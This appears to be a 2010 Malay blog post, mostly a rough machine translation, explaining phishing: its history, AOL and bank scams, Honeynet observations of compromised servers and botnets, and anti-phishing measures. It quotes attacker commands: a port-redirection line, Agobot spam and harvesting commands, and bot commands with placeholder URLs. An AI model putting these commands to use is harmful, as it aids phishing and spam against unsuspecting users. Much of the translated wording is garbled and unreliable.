Wednesday, July 14, 2010

Phishing

Phishing merupakan satu jenayah siber yang berbentuk skim penipuan untuk pengguna internet.

PHISHING

Tidak boleh disamakan dengan memancing , Pish , atau Phish .

Contoh phishing e-mel, menyamar sebagai seorang pegawai e-mel dari sebuah bank (rekaan). Pengirim berusaha untuk mengelabui penerima agar mendedahkan maklumat sulit dengan "membenarkan" itu di phisher 'website. Perhatikan salah mengeja kata-kata yang diterima dan jurang. kesalahan seperti ini adalah biasa di sebahagian besar phishing email.Juga catat bahawa walaupun URL dari laman web bank tampaknya sah, sebenarnya link ke laman web phisher's.

Di bidang keselamatan komputer , phishing adalah kejahatan penipuan proses cuba untuk mendapatkan maklumat sensitif seperti username, password dan kad kredit dengan butiran menyamar sebagai entiti boleh dipercayai dalam komunikasi elektronik. Komunikasi yang mengaku dari Hangat laman web sosial, situs lelang, prosesor pembayaran online atau pentadbir IT biasanya digunakan untuk menarik awam tidak menaruh curiga. Phishing biasanya dilakukan oleh e-mel atau mesej segera , dan sering mengarahkan pengguna untuk memasukkan butiran di website palsu yang terlihat dan terasa hampir sama dengan yang sah. Bahkan ketika menggunakan pengesahan pelayan , mungkin memerlukan kemahiran luar biasa untuk mengesan bahawa website ini palsu.

Phishing adalah contoh social engineering teknik yang digunakan untuk mengelabui pengguna, dan kegunaan miskin memanfaatkan teknologi keselamatan web saat ini. Usaha untuk menangani peningkatan jumlah melaporkan phishing insiden termasuk perundangan, latihan pengguna, kesedaran awam, dan langkah-langkah keselamatan teknikal.

Teknik phising digambarkan secara terperinci pada tahun 1987, dan penggunaan dicatat pertama dari istilah "phishing" dibuat pada tahun 1996. Istilah ini merupakan varian dari memancing, mungkin dipengaruhi oleh Phreaking , dan menyinggung maklum digunakan untuk "menangkap" maklumat kewangan dan kata laluan.

Teknik phising digambarkan secara terperinci pada tahun 1987, di dalam makalah dan persembahan disampaikan kepada International HPUser Group, Interex. menyebut tercatat pertama dari istilah "phishing" adalah pada service.America-online-alt.online Usenet news group pada tarikh 2 Januari 1996, walaupun istilah mungkin telah muncul sebelumnya dalam edisi cetak dari majalah hacker 2600 .

PHISHING DI AOL

Phishing di AOL sangat erat berkaitan dengan warez masyarakat yang dipertukarkan perisian bajakan dan adegan hacking yang dilakukan penipuan kad kredit dan kejahatan talian lain. Setelah AOL membawa tindakan pada akhir tahun 1995 untuk mengelakkan menggunakan palsu, algorithmically menghasilkan nombor kad kredit untuk membuka akaun, keropok AOL terpaksa phishing piutang yang sah dan pemanfaatan AOL.

Sebuah Phisher mungkin mengaku sebagai ahli kakitangan AOL dan menghantar mesej segera kepada korban berpotensi, meminta dia untuk mendedahkan password. Dalam rangka untuk memikat korban kepada menyerah maklumat sensitif mesej mungkin termasuk keharusan seperti "mengesahkan akaun anda "atau" mengesahkan maklumat bil ". Setelah korban telah mendedahkan password, penyerang boleh mengakses dan menggunakan akaun korban untuk tujuan penipuan atau spam .

Kedua phishing dan warezing di AOL umumnya diwajibkan-ditulis program peribadi, seperti AOHell . Phishing menjadi begitu lazim di AOL bahawa mereka menambah sebuah garisan pada semua mesej segera yang menyatakan: "tidak ada yang bekerja pada AOL akan meminta kata laluan atau maklumat bil", bahkan meskipun hal ini tidak menghalang beberapa orang dari mereka memberikan password dan maklumat peribadi jika mereka membaca dan percaya yang pertama IM. Seorang pengguna menggunakan kedua-dua akaun AIM dan akaun AOL dari ISP secara serentak boleh phish ahli AOL dengan impunitas relatif sebagai akaun AIM internet boleh digunakan oleh bukan-ahli internet AOL dan tidak boleh ditindak (iaitu-dilaporkan kepada jabatan KL AOL untuk disiplin tindakan.)

Selepas tahun 1997, dasar penegakan AOL berhubung dengan phishing dan warez menjadi ketat dan memaksa perisian bajakan dari pelayan AOL. AOL secara serentak mengembangkan sebuah sistem untuk akan mematikan akaun yang terlibat dalam phishing, sering sebelum korban boleh menjawab. Penutupan adegan warez di AOL disebabkan sebahagian besar phisher untuk meninggalkan perkhidmatan, dan banyak phisher-sering muda remaja-tumbuh dari kebiasaan itu.

PERALIHAN DARI AOL UNTUK INSTITUSI KEWANGAN
Penangkapan maklumat akaun AOL mungkin telah membuat phisher untuk maklumat penyalahgunaan kad kredit, dan menyedari bahawa serangan terhadap sistem pembayaran online adalah layak. Upaya langsung dikenali pertama menentang sistem bayaran terpengaruh E-gold pada bulan Jun 2001, yang diikuti dengan id post-9/11 tidak lama selepas serangan September 11 pada World Trade Center . Kedua-duanya dilihat pada saat itu sebagai kegagalan, tapi sekarang boleh dilihat sebagai percubaan awal terhadap serangan berbuah lebih terhadap bank mainstream. Pada tahun 2004, phishing diakui sebagai sebahagian industri sepenuhnya dari ekonomi kejahatan: pakar muncul pada skala global yang menyediakan komponen untuk tunai, yang dihimpun menjadi serangan selesai.

TEKNIK PHISHING

Phisher menyasarkan nisbah bank dan perkhidmatan pembayaran online. E-mail, seharusnya dari Internal Revenue Service , telah digunakan untuk mengumpul data sensitif dari para pembayar cukai AS. Sedangkan contoh pertama yang dihantar tanpa pandang bulu dengan harapan bahawa sesetengah akan diterima oleh nisbah bank tertentu atau perkhidmatan, kajian terkini menunjukkan bahawa phisher mungkin pada prinsipnya dapat menentukan mana bank korban berpotensi digunakan, dan sasaran e-mel palsu yang sesuai. versi Target dari phishing telah disebut tombak phishing. Setiap phishing serangan baru-baru ini telah diarahkan khusus bagi eksekutif senior dan lain-lain profil target tinggi dalam perniagaan, dan perburuan paus istilah telah dicipta bagi jenis serangan.

Halaman rangkaian sosial kini target utama phishing, kerana maklumat peribadi di tapak tersebut dapat digunakan dalam pencurian identiti ; pada akhir tahun 2006 sebuah worm komputermengambil alih halaman di MySpace dan pautan diubah untuk peselancar terus ke laman web yang direka untuk mencuri butiran login. Percubaan menunjukkan tahap kejayaan lebih dari 70% untuk serangan phishing di rangkaian sosial.

The Rapidshare file sharing site telah disasarkan oleh phishing untuk mendapatkan akaun premium, yang menghilangkan topi kelajuan di download, auto-penghapusan Gambar, menunggu di download, dan kali cooldown antara turun.

Penyerang yang masuk ke TD Ameritrade database '(mengandungi semua 6.300.000 pelanggan nombor jaminan sosial , nombor akaun dan alamat email serta nama-nama mereka, alamat, tarikh lahir, nombor telefon dan aktiviti perdagangan) juga ingin akaun username dan password , sehingga mereka melancarkan tindak lanjut tombak serangan phishing.
Hampir setengah daripada phishing pencurian pada tahun 2006 dilakukan oleh kelompok usaha melalui Rangkaian Perniagaan Russia yang berpusat di St Petersburg .

Beberapa orang yang menjadi korban oleh Scam Facebook, link yang diadakan oleh T35 Web Hosting dan orang-orang kehilangan akaun mereka.
Ada anti-phishing website yang menerbitkan mesej yang tepat yang telah baru-baru ini beredar di internet, seperti FraudWatch Antarabangsa dan Millersmiles . halaman tersebut sering memberi butiran khusus mengenai mesej tertentu.

Teknik Phishing pertama – melalui web server dikrompomi

Sebahagian besar serangan phishing yang kita amati di liar melibatkan penyerang melanggar ke pelayan terdedah dan memasang kandungan web yang berbahaya. Honeynet teknologi membolehkan kita untuk menangkap secara terperinci kitaran hidup khas serangan phishing, dan secara umum arus peristiwa yang kita amati selama insiden tersebut adalah sebagai berikut:





• Penyerang scan untuk pelayan terdedah
• Server dikompromikan dan rootkit atau backdoor dipasang terpelihara laluan
• Phisher mendapatkan akses kepada pelayan melalui pintu ini Terenkripsi kembali
• Jika pelayan dikompromikan ialah pelayan web, pre-built laman web phising di-download
• Beberapa tatarajah kandungan terhad dan ujian web halaman dilakukan (berpotensi menunjukkan alamat sejati phisher IP ketika mereka mengakses pelayan web pertama)
• alat email massa turun dan digunakan untuk mengiklan laman web palsu melalui email spam
• lalu lintas Web mula tiba di laman web phising dan potensi korban mengakses kandungan berbahaya

Teknik phising Dua - Phishing Melalui Port Redirection

Pada bulan November 2004, Jerman Honeynet Project dikerahkan klasikHoneynet genius dengan 7,3 honeypot Linux Redhat. Walaupun ini adalah keluaran sistem operasi yang relatif lama dan sasaran empuk bagi penyerang, itu menghairankan memakan masa sekitar 2,5 bulan sebelum honeypot telah berjaya dikompromikan - kontras ditandai dengan kompromi yang relatif cepat dari honeypots dibahaskan dalam insiden di atas. Maklumat lebih lanjut tentang trend ini boleh ditemui dalam kertas putih Kye dahulu " Tahu Musuh anda: Trend ".

Pada bulan Januari 2005 11, penyerang tidak berhasil kompromi honeypot itu, dengan menggunakan mengeksploitasi untuk SSLv2 OpenSSL cacat Pelanggan Kunci Remote Buffer Overflow Vulnerability hadir di 7,3 default Redhat Linux pengedaran. Insiden ini tidak biasa dalam bahawa begitu penyerang telah mendapat akses kepada sistem dikompromikan, tidak ada kandungan phishing adalah naik terus. Sebaliknya, penyerang dipasang dan dikonfigurasikan perkhidmatan redirection port pada honeypot tersebut.

Perkhidmatan ini redirection port direka untuk re-route HTTP permintaan dihantar ke web server lain honeypot web server remote dengan cara yang telus, yang berpotensi membuat lokasi sumber kandungan lebih sukar dikesan. Penyerang didownload dan dipasang alat yang disebut redir pada honeypot, yang merupakan utiliti Redirector port direka untuk Sambungan TCP yang masuk ke depan transparan ke destinasi host remote.

Dalam insiden ini penyerang menatarajah alat untuk mengarahkan ulang seluruh lalu lintas masuk pada port TCP 80 (HTTP) dari honeypot untuk TCP Port 80 (HTTP) pada web server remote di China. Menariknya, penyerang tidak repot-repot memasang rootkit untuk menyembunyikan kehadiran mereka pada honeypot, yang menunjukkan bahawa penyerang tidak menghargai dikompromikan pelayan terlalu tinggi dan bahawa mereka tidak terlalu bimbang tentang menjadi dikesan.

Perintah yang digunakan oleh penyerang untuk menetapkan port redirection adalah:

redir --lport=80 --laddr= --cport=80 --caddr=221.4.XXX.XXX

Selain itu, penyerang mengubahsuai sistem Linux start up file / etc / rc.d / rc.local untuk memastikan bahawa port redir perkhidmatan Redirector akan restart jika sistem honeypot itu reboot, meningkatkan kesempatan hidup untuk perkhidmatan redirection port mereka . Mereka kemudian mula menghantar e-mel spam phishing yang diiklankan pada honeypot, contoh yang boleh dijumpai di sini (perhatikan bahawa maklumat sensitif yang relevan telah dikaburkan).

Untuk lebih mengetahui kegiatan untuk phisher, ahli Projek Honeynet Jerman turun tangan dan diam-diam buat kali terakhir tatarajah alat redir penyerang dipasang pada honeypot itu, membolehkan penebangan dalam aplikasi redir sendiri, untuk lebih mudah mengamati bagaimana orang banyak menerima email spam iklan honeypot dan kemudian mengklik hyperlink untuk mengakses kandungan telus phishing diarahkan.

Dalam waktu sekitar 36 jam, 721 alamat IP yang unik yang diarahkan, dan sekali lagi kami terkejut oleh berapa ramai pengguna yang ternyata ditipu ke dalam mengakses kandungan tersebut melalui email phishing. Analisis alamat IP yang mengakses port Redirector honeypot boleh dijumpai di sini (perhatikan bahawa maklumat ini telah dibersihkan untuk melindungi pengguna yang mengakses kandungan phishing, dan sekali lagi hanya IP data login selama penelitian ini. Tidak ada data rahsia pengguna ditangkap ).

Teknik phising Tiga - Menggunakan Phishing botnet

Kertas putih baru-baru ini oleh Projek Honeynet disebut " Kye: Penjejakan botnet "memperkenalkan kaedah untuk mengesan botnet. botnet adalah rangkaian komputer yang boleh dikompromikan dikendalikan oleh penyerang.Kerana saiz besar mereka (puluhan ribu sistem dapat dihubungkan bersama-sama), botnet boleh menjadi ancaman berat bagi masyarakat apabila digunakan untuk Denial-of-Service (DoS) serangan.

kajian awal di kawasan ini menunjukkan bahawa botnet kadang-kadang digunakan untuk menghantar email spam dan juga boleh digunakan untuk serangan phishing. Selama kajian pada bulan Oktober 2004, email syarikat keselamatan CipherTrustmenyarankan bahawa 70% dari spam phishing dipantau dihantar melalui salah satu daripada lima botnet aktif, tapi hasil pengamatan kita sendiri menunjukkan bahawa lebih banyak botnet digunakan untuk operasi spam.Meskipun tidak analisis satu insiden tunggal, pada bahagian ini kami menyajikan pengamatan kami pada perkakas dan teknik yang digunakan oleh penyerang terbabit dalam phising melalui botnet.

Insiden Timeline
Selama tempoh antara September 2004 dan Januari 2005, Jerman Honeynet Project dikerahkan serangkaian un-patch Microsoft Windows honeypots berasaskan untuk mengamati aktiviti botnet. Sebuah proses automatik dikembangkan untuk membolehkan honeypots harus berkali-kali digunakan, dikompromikan dan shutdown untuk analisis forensik. Selama tempoh ini lebih dari 100 botnet berasingan diamati dan beribu-ribu gambar yang diambil untuk analisis offline.

Analisa
Beberapa versi dari perisian bot diambil selama projek penyelidikan ini memberikan kemampuan untuk jarak jauh memulakan v4/v5 socks proxy pada host dikompromikan. Socks mempunyai mekanisme proxy generik untuk TCP / aplikasi rangkaian berasaskan IP ( RFC 1.928 ) dan boleh digunakan untuk lalu lintas Internet yang paling popular proksi, seperti HTTP atau email SMTP.Jika seorang penyerang yang mempunyai akses ke sebuah botnet membolehkan fungsi socks proxy pada bot remote, mesin ini kemudian boleh digunakan untuk menghantar e-mel spam massa. Jika botnet mengandungi beribu-ribu host dikompromikan, penyerang kemudian boleh menghantar sejumlah besar email massal yang sangat mudah, sering dari berbagai alamat IP adalah dimiliki oleh pengguna PC rumahan yang tidak menaruh curiga.
Tidak adanya titik pusat kenalan dan julat melintasi batas-batas antarabangsa boleh membuat sangat sulit untuk menelusuri dan menghentikan kegiatan seperti itu, sehingga risiko rendah, tapi imbalannya berpotensi tinggi untuk spammer dan phisher. Mungkin heran, pemilik botnet akal mulai untuk menyasarkan kegiatan jenayah dan sekarang mungkin untukmenyewa sebuah botnet . Untuk biaya, pembekal botnet akan menyediakan pelanggan dengan senarai Socks v4 alamat IP pelayan dan port yang mampu.Ada didokumentasikan kes di mana botnet tersebut dijual kepada spammer sebagai spam-relay: " terbongkar: Trojan sebagai Spam Robots ". Beberapa perisian bot ditangkap juga melaksanakan fungsi khusus untuk panen-alamat e-mel atau untuk menghantar spam melalui bots. Senarai berikut menunjukkan beberapa perintah yang berkaitan dengan penghantaran spam / email phishing dilaksanakan dalam Agobot, sebuah bot yang popular digunakan oleh penyerang dan variasi secara teratur diambil selama penyelidikan honeynet:

• harvest.emails - "membuat bot mendapatkan senarai e-mel"
• harvest.emailshttp - "membuat bot mendapatkan senarai e-mel melalui HTTP"
• spam.setlist - "download senarai email"
• spam.settemplate - "download email template"
• spam.start - "bermula spamming"
• spam.stop - "berhenti spamming"
• aolspam.setlist - "AOL - download sebuah senarai e-mel"
• aolspam.settemplate - "AOL - download email template"
• aolspam.setuser - "AOL - set username"
• aolspam.setpass - "AOL - set password"
• aolspam.start - "AOL - bermula spamming"
• aolspam.stop - "AOL - berhenti spamming"

Maklumat lebih lanjut tentang bagaimana perintah ini dilaksanakan bolehditemui di sini di samping nota tentang sumber kod dari bot. Dengan bantuandengung, pelanggan IRC disesuaikan dibangunkan oleh Projek Honeynet Jerman, kami boleh mempelajari lebih lanjut tentang bagaimana bots digunakan untuk spam / serangan phishing e-mel dengan menyeludup pelanggan palsu ke dalam botnet menggunakan sambungan data yang dikumpul melalui serangan terhadap honeynets kami. Beberapa contoh khas kegiatan diamati adalah sebagai berikut.

Contoh 1
Dalam satu botnet tertentu kami mengamati seorang penyerang yang mengeluarkan perintah berikut (berharap perhatian bahawa URL yang telah dikaburkan):
. Mm http://www.example.com/email/fetch.php?4a005aec5d7dbe3b01c75aab2b1c9991 http://www.foobar.net/pay.html Joe did_u_send_me_this

Perintah mm (. "Email massa") adalah versi khusus dari perintah spam.start generik. Perintah ini menerima empat parameter:

1. URL untuk fail yang mengandungi beberapa alamat email.
2. Laman web untuk menyasarkan dalam e-mel spam - ini boleh menjadi web spam muzik-laman atau laman web phising.
3. Nama penghantar.
4. Subjek email.

Dalam hal ini, script fetch.php 30 kembali alamat email yang berbeza setiap kali itu dipanggil. Untuk masing-masing penerima, mesej email dibina yang diiklankan parameter kedua perintah. Dalam contoh ini, menunjuk ke laman-web yang cuba untuk memasang ActiveX komponen pada komputer korban.

Contoh 2
Dalam botnet lain yang kami amati pemasangan Browser Helper Objects pada PC korban:
[TOPIC] #spam9 :.open http://amateur.example.com/l33tag3/beta.html -s
Itu. Terbuka perintah setiap memberitahu bot untuk membuka laman web yang diminta dan memaparkan kepada korban. Dalam hal ini-laman web mengandungi Browser Helper Object (BHO) yang akan cuba untuk memasang sendiri pada komputer korban. Sebagai nama saluran menunjukkan, botnet ini juga digunakan untuk menghantar spam.

Contoh 3
Dalam botnet lain yang kami amati contoh propagasi spyware:

http://public.example.com/prompt.php?h=6d799fbeef3a9b386587f5f7b37f[...]
Link ini ditemui selama analisis malware ditangkap. Ini mengarahkan korban ke laman-web syarikat yang menawarkan "perisian bebas penghantaran iklan yang menyediakan iklan disasarkan menawarkan". Laman web ini mengandungi beberapa laman web yang cuba untuk memasang komponen ActiveX pada melawat pelanggan, mungkin adware atau spyware.



Manipulasi

Sebahagian besar kaedah phishing menggunakan beberapa bentuk penipuan teknikal direka untuk membuat link dalam e-mel (dan laman web palsu itu mengarah ke) akan muncul menjadi milik organisasi palsu. Salah eja URL atau penggunaan subdomain yang trik umum digunakan oleh phisher.

Dalam URL berikut contoh, http://www.yourbank.example.com/, nampak seolah-olah URL yang akan membawa anda ke bahagian contoh halaman yourbank; sebenarnya URL ini menunjuk pada "yourbank" (iaitu phishing) sebahagian daripada laman web misalnya.

Trik lain yang umum adalah untuk membuat jangkar teks untuk link tampaknya masih berlaku, bila link itu benar-benar pergi ke phisher 'halaman. Link contoh berikut, http://en.wikipedia.org/wiki/Genuine , tampaknya membawa anda ke rencana bertajuk "Asli"; mengklik justeru akan membawa anda ke rencana bertajuk "Penipuan". Di sisi sudut kiri bawah browser yang paling anda boleh melihat pratonton dan mengesahkan mana link ini akan membawa anda.

Sebuah kaedah lama spoofing link yang digunakan mengandungi '@' simbol, awalnya dimaksudkan sebagai cara untuk memasukkan nama pengguna dan password (bertentangan dengan standard). Sebagai contoh, link @ http://www.google.com members.tripod.com / boleh menipu pemerhati yang biasa menjadi percaya bahawa itu akan membuka laman pada www.google.com, padahal sebenarnya mengarahkan pelayar ke sebuah laman tentang members.tripod.com, dengan menggunakan nama pengguna dari www.Google. com: laman terbuka biasa, terlepas dari username yang disediakan.

URL tersebut telah dimatikan di Internet Explorer , sementaraMozilla Firefox dan Opera memaparkan mesej amaran dan memberikan pilihan untuk melanjutkan ke halaman atau membatalkan.

Masalah lebih lanjut dengan URL yang telah dijumpai dalam pengendalian nama domain pengantarabangsaan (MYS) di pelayar web , yang mungkin membolehkan identik visual alamat web untuk memimpin anda berbeza, mungkin berbahaya, website.

Terlepas dari publisiti yang mengelilingi cacat, dikenali sebagai MYS spoofing atau serangan homograf , phisher telah mengambil keuntungan dari risiko yang sama, dengan menggunakan buka redirectors URL pada halaman-halaman organisasi yang dipercayai untuk menyamarkan URL berbahaya dengan domain yang dipercayai.

Bahkan sijil digital tidak menyelesaikan masalah ini kerana sangat mungkin untuk phisher untuk membeli sijil yang sah dan kemudian mengubah kandungan untuk menipu website asal.


Penggelapan Filter

Phisher telah menggunakan gambar daripada teks untuk mempersulit anti-phishing penapis untuk mengesan teks biasa digunakan dalam e-mel phishing.

Pemalsuan Website

Setelah korban melawat halaman phising penipuan belum berakhir. Beberapa penipuan phishing menggunakan JavaScript arahan untuk menukar address bar . Hal ini dilakukan baik dengan menempatkan gambar URL sah atas address bar, atau dengan menutup panel alamat asli dan membuka yang baru dengan URL sah .

Seorang penyerang bahkan boleh menggunakan kelemahan di laman web sendiri itu script dipercayai terhadap korban. Jenis-jenis serangan (dikenali sebagai -site scripting lintas ) sangat bermasalah, kerana mereka mengarahkan pengguna untuk sign in di bank atau sendiri web perkhidmatan laman, di mana segala sesuatu dari alamat web ke sijil keselamatan yang betul muncul.

Pada kenyataannya, link ke website ini dibuat untuk melaksanakan serangan, sehingga sangat sulit untuk tempat tanpa pengetahuan khusus. Hanya seperti cacat digunakan pada tahun 2006 terhadap PayPal .

A Universal Man-in-the-middle Phishing Kit, ditemui oleh RSA Security , menyediakan digunakan antara muka yang mudah yang membolehkan phisher untuk meyakinkan menyalinkan halaman dan menangkap log-in detail masuk di laman web palsu.

Untuk mengelakkan phishing anti-teknik yang mengimbas laman web yang berkaitan dengan teks phishing, phisher telah mula menggunakanFlash berasaskan-laman web. Ini terlihat serupa dengan laman web yang sebenarnya, namun menyembunyikan teks dalam objek multimedia.

Telefon phishing

Tidak semua serangan phishing memerlukan website palsu. Mesej yang mengaku berasal dari bank kepada pengguna untuk menghubungi nombor telefon tentang masalah dengan akaun bank mereka. Sekali nombor telefon (yang dimiliki oleh phisher, dan yang disediakan olehVoice over IP ) adalah keluar, meminta kepada pengguna jasa untuk memasukkan nombor akaun dan PIN. Vishing (voice phishing) kadang-kadang menggunakan data-ID pemanggil palsu untuk memberikan kesan bahawa panggilan berasal dari organisasi yang dipercayai.


Teknik Lain

Serangan lain yang digunakan untuk meneruskan sukses adalah pelanggan untuk itu sah halaman bank, kemudian ke tempat tetingkap popup yang meminta mandat di atas laman web dengan cara yang muncul bank meminta maklumat sensitif.
Salah satu teknik phishing terkini tabnabbing . Ia mengambil keuntungan dari beberapa tab bahawa pengguna menggunakan dan diam-diam mengarahkan semula pengguna ke halaman yang terkena kesan.


Akibat Phishing


Kerosakan yang disebabkan oleh phishing berkisar dari penolakan akses kepada e-mel ke kerugian kewangan yang cukup besar.Dianggarkan bahawa antara bulan Mei 2004 dan Mei 2005, 1,2 juta pengguna komputer sekitar di Amerika Syarikat menderita kerugian akibat phishing, berjumlah sekitar US $ 929.000.000.

Amerika Syarikat kehilangan perniagaan dianggarkan US $ 2 bilion per tahun sebagai pelanggan mereka menjadi korban. Pada tahun 2007, serangan phishing meningkat. 3.600.000 orang dewasa kehilangan US $3200000000 dalam 12 bulan berakhir pada Ogos 2007. Microsoft tuntutan estimasi ini terlalu berlebihan dan menempatkan kerugian phishing tahunan di AS pada US $ 60 juta.

Di United Kingdom kerugian dari web-penipuan perbankan sebahagian besar dari phishing-hampir dua kali ganda menjadi GB £ 23.2m pada tahun 2005, dari GB £ 12.2m pada tahun 2004, sementara 1 dari 20 pengguna komputer mendakwa telah kehilangan ke phishing pada tahun 2005.

Sikap yang dipertimbangkan oleh perbankan Inggeris tubuh APACS adalah bahawa "pelanggan juga harus mengambil tindakan yang masuk akal sehingga mereka tidak terdedah kepada jenayah." Begitu juga, ketika banjir pertama serangan phishing Republik hit sektor perbankan yang Ireland pada bulan September 2006, Bank Ireland awalnya menolak untuk menutup kerugian yang diderita oleh pelanggan (dan masih berkeras bahawa dasar adalah untuk tidak melakukannya ), walaupun kerugian untuk lagu € 11.300 dibuat baik.
Anti phishing
Ada beberapa teknik yang berbeza untuk memerangi phishing, termasuk perundangan dan teknologi dicipta khusus untuk melindungi terhadap phising.



Tanggapan Sosial


Salah satu strategi untuk memerangi phishing adalah untuk melatih orang untuk mengenali usaha phishing, dan untuk menangani mereka.Pendidikan boleh berkesan, terutama di mana latihan memberikan jawapan terus. Satu taktik phising baru, yang menggunakan e-mel phishing yang disasarkan pada khusus syarikat, yang dikenali sebagai phishing tombak, telah dimanfaatkan untuk melatih individu di berbagai lokasi, termasuk Akademi Tentera Amerika Syarikat di West Point, NY.

Dalam sebuah percubaan 2004 Jun dengan tombak phishing, 80% dari 500 kadet West Point yang dihantar palsu e-mel telah tertipu untuk mendedahkan maklumat peribadi.

Orang boleh mengambil langkah-langkah untuk mengelakkan usaha phishing dengan sedikit memodifikasi kebiasaan browsing mereka.Ketika dihubungi mengenai akaun perlu menjadi "disahkan" (atau topik lain yang digunakan oleh phisher), itu adalah tindakan pencegahan yang masuk akal untuk menghubungi syarikat yang e-mel yang tampaknya berasal untuk menyemak bahawa e-mel yang sah.

Atau, alamat bahawa individu adalah yang asal tahu laman syarikat boleh ditaip ke dalam bar alamat pelayar, bukan percaya setiap hyperlink dalam mesej phishing disyaki.

Hampir semua mesej e-mel yang sah dari syarikat untuk pelanggan mereka mengandungi item dari informasi yang tidak tersedia untuk phisher. Beberapa syarikat, misalnya PayPal , selalu alamat pelanggan mereka dengan username mereka di e-mel, jadi jika sebuah alamat e-mel penerima secara generik ("pelanggan yang terhormat PayPal") itu mungkin suatu usaha phishing.

E-mel dari bank dan syarikat kad kredit sering memasukkan nombor akaun separa. Namun, kajian baru-baru ini telah menunjukkan bahawa masyarakat tidak biasanya membezakan antara beberapa angka pertama dan beberapa angka terakhir dari nombor akaun yang signifikan masalah-sejak beberapa digit pertama seringkali sama untuk semua pelanggan dari institusi kewangan .

Orang-orang dapat dilatih untuk memiliki kecurigaan mereka terangsang jika mesej tidak mengandungi maklumat personal terperinci. usaha Phishing pada awal 2006, namun, maklumat peribadi yang digunakan, yang membuatnya tidak selamat untuk menganggap bahawa kehadiran maklumat peribadi sendiri menjamin bahawa mesej yang sah.

Selain itu, kajian terkini menyimpulkan lain di bahagian bahawa kewujudan maklumat peribadi tidak tidak secara signifikan mempengaruhi tahap kejayaan serangan phishing, yang menunjukkan bahawa kebanyakan orang tidak memperhatikan butiran tersebut.

The Anti-Phishing Working Group , sebuah persatuan industri dan penguatkuasaan undang-undang, menyatakan bahawa teknik phishing konvensional boleh menjadi usang di masa depan kerana orang-orang semakin sedar teknik kejuruteraan sosial yang digunakan oleh phisher. Mereka meramalkan bahawa pharming dan lain-lain menggunakan dari malware akan menjadi lebih umum alat untuk mencuri maklumat.

Setiap orang boleh membantu mendidik masyarakat dengan menolak amalan-amalan yang selamat, dan menghindari yang berbahaya.Malangnya, bahkan-pemain yang dikenali juga dikenali untuk menghasut pengguna untuk perilaku yang berbahaya, misalnya dengan meminta pengguna mereka untuk mendedahkan password mereka untuk perkhidmatan pihak ketiga, seperti email.


Tanggapan Teknikal

Langkah-langkah Anti-phishing telah dilaksanakan sebagai ciri-ciri tertanam dalam browser, sebagai perluasan atau toolbar untuk browser, dan sebagai sebahagian daripada prosedur login website. Berikut adalah beberapa pendekatan utama untuk masalah ini.

Membantu untuk mengenalpasti laman-laman web yang sah

Kebanyakan laman web yang disasarkan untuk phishing adalah halaman dalam yang bermaksud bahawa SSL dengan PKI kriptografi yang kuat digunakan untuk pengesahan pelayan, di mana website URL digunakan sebagai identifier. Secara teori seharusnya mungkin untuk pengesahan SSL untuk digunakan untuk mengesahkan halaman bagi pengguna, dan ini adalah SSL desain dan v2 meta browsing dalam.Tapi dalam prakteknya, ini adalah trik mudah.

Kelemahan dangkal adalah bahawa keselamatan antara muka pengguna pelayar (UI) tidak cukup untuk menangani ancaman yang kuat hari ini. Ada tiga bahagian untuk mengamankan pengesahan menggunakan TLS dan sijil: menunjukkan bahawa sambungan dalam mod otentik, menunjukkan pengguna laman web yang disambungkan ke, dan menunjukkan yang kuasa mengatakan itu laman web ini. Ketiga diperlukan untuk pengesahan, dan perlu disahkan oleh / kepada pengguna.

Sambungan Aman. Display standard untuk browsing dalam tahun 1990-an pertengahan hingga pertengahan tahun 2000-an adalah gembok.Pada tahun 2005, Mozilla menerjunkan URL Bar kuning 2005 sebagai penunjuk yang lebih baik dari Sambungan yang selamat. Inovasi ini kemudian terbalik kerana sijil EV , yang menggantikan sijil tertentu mempunyai tingkat tinggi pengesahan identiti organisasi dengan layar hijau, dan sijil lain dengan favicon diperpanjang tempat biru di sebelah kiri bar URL (selain switch daripada "http" menjadi "https" pada url itu sendiri).

Pengguna laman web ini diharapkan untuk mengesahkan bahawa nama domain di's URL Bar, pelayar sebenarnya di mana mereka berniat untuk pergi. URL boleh terlalu kompleks untuk dihuraikan dengan mudah. Pengguna sering tidak tahu atau mengenali URL dari halaman yang sah mereka berniat untuk menyambung ke, sehingga pengesahan menjadi bermakna.

Sebuah keadaan untuk pengesahan pelayan yang bermaksud adalah memiliki identifier pelayan yang berarti bagi pengguna; banyak e-dagang halaman akan mengubah nama domain dalam mengatur keseluruhan tapak mereka, menambah peluang untuk kebingungan. Hanya memaparkan nama domain untuk melawat halaman kerana beberapa toolbar anti-phishing lakukan adalah tidak cukup.

Beberapa pelayar yang lebih baru, seperti Internet Explorer 8 , memaparkan semua URL dalam abu-abu, hanya dengan nama domain sendiri di hitam, sebagai sarana untuk membantu pengguna adalah dalam mengenalpasti URL penipuan.

Sebuah pendekatan alternatif adalah petname sambungan untuk Firefox yang membolehkan pengguna di label jenis mereka sendiri untuk laman web, sehingga mereka nantinya dapat mengenali ketika mereka telah kembali ke halaman.

Jika laman web ini tidak dikenali, maka software baik dapat memberi amaran kepada pengguna atau memblok halaman sekaligus. Centric ini ialah pengurusan identiti-identiti pengguna pelayan. Beberapa menyarankan bahawa citra grafik yang dipilih oleh pengguna lebih baik dari sebuah petname.

Dengan munculnya sijil EV , pelayar sekarang biasanya memaparkan nama organisasi dalam warna hijau, yang jauh lebih jelas dan mudah-mudahan lebih konsisten dengan harapan pengguna. Malangnya, penjual, pelayar telah memilih untuk memaparkan terkemuka had ini hanya untuk sijil EV , sehingga pengguna untuk mengurus dirinya sendiri dengan semua sijil lain.

Siapa Pihak Berkuasa. Browser perlu negara yang kuasa yang membuat tuntutan yang pengguna disambungkan ke. Pada tahap yang paling mudah, kuasa tidak disebutkan, dan kerana itu, pelayar kuasa, sejauh pengguna yang bersangkutan. Para penjual pelayar memuat tanggung jawab ini dengan mengendalikan pendaftaran akar CA diterima. Ini adalah amalan piawai saat ini.

Masalah dengan hal ini adalah bahawa tidak semua pihak berkuasa pensijilan (CA) menggunakan pemeriksaan sama baik atau berlaku, terlepas dari usaha oleh penjual pelayar untuk mengawal high. Juga tidak semua CA melanggan ke model yang sama dan konsep bahawa sijil hanya sekitar pengesahan organisasi e-dagang Pengeluaran.

